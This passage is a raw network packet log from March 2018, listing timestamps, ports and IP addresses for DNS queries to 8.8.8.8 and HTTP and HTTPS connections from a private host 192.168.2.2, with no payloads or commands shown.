Mar 1, 2018 09:57:48.050041914 CET	58653	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.184550047 CET	57327	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.195950031 CET	56352	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.318675041 CET	62091	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.361860037 CET	49177	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:48.361984015 CET	443	49177	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:48.362145901 CET	49177	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:48.410285950 CET	63509	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.588556051 CET	53	65034	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:48.626533031 CET	51492	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:48.630852938 CET	62750	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.048588037 CET	58653	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.052361012 CET	53	58653	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:49.093451977 CET	58913	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.179075003 CET	57327	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.188642025 CET	56352	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.285398006 CET	53	57327	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:49.305655956 CET	63309	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.318974018 CET	62091	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.409051895 CET	63509	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.620362997 CET	51492	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.630023956 CET	62750	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.673552036 CET	53	56352	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:49.716496944 CET	52316	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:49.870814085 CET	53	62091	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:49.884939909 CET	65236	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:50.090126038 CET	58913	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:50.119647026 CET	53	63509	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:50.146027088 CET	55904	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:50.301424026 CET	63309	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:50.332331896 CET	53	51492	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:50.505001068 CET	53	62750	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:50.678735018 CET	53	58653	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:50.711474895 CET	52316	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:50.839226961 CET	53	58913	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:50.880867004 CET	65236	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:51.141469955 CET	55904	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:51.261076927 CET	53	57327	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:51.301836967 CET	63309	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:51.436458111 CET	53	56352	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:51.632910967 CET	53	63309	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:51.712451935 CET	52316	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:51.827815056 CET	53	62091	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:51.882541895 CET	65236	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:52.101938009 CET	53	63509	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:52.146043062 CET	55904	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:52.352705956 CET	53	51492	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:52.581501961 CET	53	62750	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:52.804613113 CET	53	52316	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:52.868280888 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:52.868364096 CET	443	49171	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:52.868505001 CET	49171	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:52.869898081 CET	49182	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:52.869926929 CET	443	49182	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:52.870012045 CET	49182	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:52.871417999 CET	49182	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:52.871442080 CET	443	49182	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:53.104418039 CET	53	65236	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:53.121618032 CET	49183	80	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:53.121644974 CET	80	49183	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:53.121706963 CET	49183	80	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:53.121984959 CET	49183	80	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:53.121997118 CET	80	49183	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:53.322925091 CET	53	58913	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:53.508179903 CET	53	55904	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:53.509200096 CET	49184	80	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:53.509218931 CET	80	49184	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:53.509253979 CET	49184	80	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:53.509593964 CET	49184	80	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:53.509604931 CET	80	49184	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:53.700113058 CET	53	63309	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:53.871021986 CET	53	52316	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:54.326128960 CET	53	65236	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:54.507950068 CET	53	55904	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:54.673943043 CET	53	63309	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:54.966181993 CET	49168	80	192.168.2.2	67.199.248.11
Mar 1, 2018 09:57:54.966238022 CET	49169	80	192.168.2.2	45.33.77.71
Mar 1, 2018 09:57:55.259068012 CET	53	52316	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:55.425334930 CET	53	65236	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:55.583376884 CET	53	55904	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:56.419804096 CET	443	49182	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:56.419919968 CET	49182	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:56.429860115 CET	49182	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:56.429877996 CET	443	49182	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:56.436294079 CET	49182	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:56.436311007 CET	443	49182	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:56.564547062 CET	80	49183	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:56.692864895 CET	80	49184	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:56.764132977 CET	80	49183	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:56.764353991 CET	49183	80	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:56.892170906 CET	80	49184	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:56.892436981 CET	49184	80	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:57.491343021 CET	443	49182	172.217.3.164	192.168.2.2
Mar 1, 2018 09:57:57.491532087 CET	49182	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:57:57.493927002 CET	49185	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:57.493963957 CET	443	49185	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:57.494323015 CET	49185	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:57.496608019 CET	49185	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:57.496640921 CET	443	49185	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:58.482007027 CET	443	49185	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:58.482223034 CET	49185	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:58.500673056 CET	49185	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:58.500699997 CET	443	49185	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:58.637557030 CET	49185	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:58.637577057 CET	443	49185	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:59.442168951 CET	443	49185	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:59.442183018 CET	443	49185	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:59.442193031 CET	443	49185	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:59.443057060 CET	49185	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:59.443370104 CET	49185	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:59.443440914 CET	443	49185	172.217.3.174	192.168.2.2
Mar 1, 2018 09:57:59.443487883 CET	49185	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:59.443859100 CET	49185	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:57:59.707160950 CET	55581	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:00.486648083 CET	53	55581	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:02.740982056 CET	49176	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:02.741080999 CET	443	49176	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:02.741343975 CET	49176	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:02.742430925 CET	49186	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:02.742455959 CET	443	49186	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:02.742714882 CET	49186	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:02.744270086 CET	49186	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:02.744282961 CET	443	49186	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:04.063004017 CET	443	49186	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:04.063263893 CET	49186	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:04.082361937 CET	49186	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:04.082389116 CET	443	49186	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:04.094254971 CET	49186	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:04.094281912 CET	443	49186	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:05.363719940 CET	443	49186	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:05.363935947 CET	49186	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:05.370515108 CET	49187	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:05.370558977 CET	443	49187	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:05.372625113 CET	49187	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:05.374728918 CET	49187	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:05.374761105 CET	443	49187	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:06.607444048 CET	443	49187	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:06.607690096 CET	49187	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:06.626677036 CET	49187	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:06.626703978 CET	443	49187	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:06.768696070 CET	49187	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:06.768714905 CET	443	49187	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:07.847242117 CET	443	49187	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:07.847263098 CET	443	49187	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:07.847270012 CET	443	49187	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:07.847501993 CET	49187	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:07.855417967 CET	49187	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:07.855556965 CET	443	49187	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:07.855587959 CET	49187	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:07.856175900 CET	49187	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:08.090728998 CET	57178	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:09.087626934 CET	57178	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:09.124780893 CET	53	57178	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:09.842176914 CET	53	57178	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:11.388729095 CET	49182	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:11.388895988 CET	443	49182	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:11.389520884 CET	49182	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:11.392081976 CET	49188	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:11.392137051 CET	443	49188	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:11.392477989 CET	49188	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:11.394680023 CET	49188	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:11.394714117 CET	443	49188	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:12.361988068 CET	443	49188	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:12.362198114 CET	49188	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:12.382798910 CET	49188	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:12.382827044 CET	443	49188	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:12.395117044 CET	49188	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:12.395143986 CET	443	49188	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:13.353374958 CET	443	49188	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:13.353519917 CET	49188	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:13.359359026 CET	49189	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:13.359388113 CET	443	49189	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:13.363105059 CET	49189	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:13.364890099 CET	49189	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:13.364913940 CET	443	49189	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:14.188034058 CET	443	49189	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:14.188425064 CET	49189	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:14.198885918 CET	49189	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:14.198904991 CET	443	49189	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:14.212994099 CET	49189	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:14.213011026 CET	443	49189	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:15.509068966 CET	443	49189	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:15.509088993 CET	443	49189	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:15.509097099 CET	443	49189	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:15.509527922 CET	49189	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:15.509881020 CET	49189	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:15.510010004 CET	443	49189	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:15.510046959 CET	49189	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:15.510658026 CET	49189	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:15.794493914 CET	62406	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:16.788600922 CET	62406	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:17.755737066 CET	53	62406	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:18.240710974 CET	53	62406	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:18.476654053 CET	58563	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:19.472383976 CET	58563	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:20.021548986 CET	49186	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:20.021693945 CET	443	49186	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:20.022406101 CET	49186	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:20.024610996 CET	49190	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:20.024656057 CET	443	49190	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:20.025041103 CET	49190	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:20.027208090 CET	49190	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:20.027241945 CET	443	49190	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:20.410403967 CET	53	58563	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:20.415878057 CET	49408	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:21.415131092 CET	49408	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:21.494505882 CET	53	58563	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:22.416321993 CET	49408	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:23.132219076 CET	443	49190	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:23.132493973 CET	49190	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:23.152424097 CET	49190	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:23.152450085 CET	443	49190	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:23.164300919 CET	49190	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:23.164328098 CET	443	49190	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:24.052798033 CET	53	49408	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:24.477866888 CET	53	49408	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:25.026657104 CET	443	49190	172.217.3.164	192.168.2.2
Mar 1, 2018 09:58:25.027034044 CET	49190	443	192.168.2.2	172.217.3.164
Mar 1, 2018 09:58:25.031126976 CET	49192	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:25.031158924 CET	443	49192	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:25.032265902 CET	49192	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:25.033648014 CET	49192	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:25.033670902 CET	443	49192	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:25.453747034 CET	53	49408	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:32.896441936 CET	61609	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:33.892751932 CET	61609	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:34.103615999 CET	443	49192	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:34.103888988 CET	49192	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:34.124435902 CET	49192	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:34.124464035 CET	443	49192	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:34.306433916 CET	49192	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:34.306449890 CET	443	49192	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:34.894555092 CET	61609	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:34.973774910 CET	53	61609	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:34.977785110 CET	59433	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:35.981460094 CET	59433	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:36.197613955 CET	53	61609	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:36.197792053 CET	443	49192	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:36.197804928 CET	443	49192	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:36.197810888 CET	443	49192	172.217.3.174	192.168.2.2
Mar 1, 2018 09:58:36.198210955 CET	49192	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:36.198416948 CET	49192	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:36.198465109 CET	49192	443	192.168.2.2	172.217.3.174
Mar 1, 2018 09:58:36.977011919 CET	59433	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:58:38.092425108 CET	53	61609	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:38.785633087 CET	53	59433	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:39.213612080 CET	53	59433	8.8.8.8	192.168.2.2
Mar 1, 2018 09:58:40.099805117 CET	53	59433	8.8.8.8	192.168.2.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 1, 2018 09:56:35.684814930 CET	56842	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:36.692917109 CET	56842	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:37.174513102 CET	53	56842	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:37.867747068 CET	53	56842	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:46.234924078 CET	53440	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:47.231744051 CET	53440	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:47.479697943 CET	53	53440	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:48.285332918 CET	59605	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:48.529203892 CET	53	53440	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:49.282732010 CET	59605	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:49.593730927 CET	50900	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:49.750072956 CET	51075	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:50.271864891 CET	53	59605	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:50.744911909 CET	51075	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:50.755230904 CET	53	59605	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:51.002640963 CET	53	50900	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:51.194181919 CET	53	51075	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:51.513185978 CET	53	51075	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:51.518181086 CET	50900	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:52.243382931 CET	53	50900	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:53.685393095 CET	61674	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:55.169131994 CET	53	61674	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:55.219652891 CET	61674	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:55.326189041 CET	59291	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:56.322947025 CET	59291	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:57.324069977 CET	59291	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:56:57.743043900 CET	53	61674	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:58.800394058 CET	53	59291	8.8.8.8	192.168.2.2
Mar 1, 2018 09:56:59.264214039 CET	53	59291	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:00.425441027 CET	53	59291	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:11.162659883 CET	63053	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:12.156527042 CET	63053	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:13.158276081 CET	63053	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:13.158828020 CET	53	63053	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:14.191948891 CET	60812	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:14.301306009 CET	53	63053	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:15.209913969 CET	60812	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:15.524403095 CET	53	63053	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:16.211612940 CET	60812	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:16.825757027 CET	53	60812	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:18.208877087 CET	53	60812	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:19.339163065 CET	53	60812	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:20.221069098 CET	58523	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:20.428879976 CET	65490	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:20.531554937 CET	60652	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.002276897 CET	57729	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.229552031 CET	58523	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.429204941 CET	65490	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.529062033 CET	60652	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.603058100 CET	53	58523	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:21.676773071 CET	65311	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.911025047 CET	53	65490	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:21.977274895 CET	50323	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:21.999732971 CET	57729	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:22.530736923 CET	60652	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:22.670649052 CET	65311	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:22.956949949 CET	53	60652	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:22.975256920 CET	50323	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:22.980951071 CET	64115	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:23.004892111 CET	57729	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:23.332871914 CET	53	57729	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:23.359987020 CET	59195	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:23.655411959 CET	53	58523	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:23.672350883 CET	65311	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:23.941188097 CET	53	65490	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:24.012903929 CET	64115	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:24.014298916 CET	50323	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:24.353622913 CET	59195	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:24.604068995 CET	53	60652	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:24.884758949 CET	53	65311	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:25.014039040 CET	64115	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:25.262485027 CET	53	50323	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:25.355865002 CET	59195	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:25.564321041 CET	53	57729	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:25.863488913 CET	53	60652	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:26.207884073 CET	53	65311	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:26.739892960 CET	53	50323	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:27.017045021 CET	64115	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:27.058597088 CET	53	64115	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:27.317419052 CET	53	57729	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:27.358584881 CET	59195	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:27.779385090 CET	53	59195	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:28.063702106 CET	53	65311	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:28.311620951 CET	53	64115	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:28.721529961 CET	53	50323	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:28.913222075 CET	53	59195	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:29.412544012 CET	53	64115	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:29.799603939 CET	53	59195	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:30.052643061 CET	53	64115	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:30.674688101 CET	53	59195	8.8.8.8	192.168.2.2
Mar 1, 2018 09:57:37.778156996 CET	58138	53	192.168.2.2	8.8.8.8
Mar 1, 2018 09:57:38.773844004 CET	58138	53	192.168.2.2	8.8.8.8
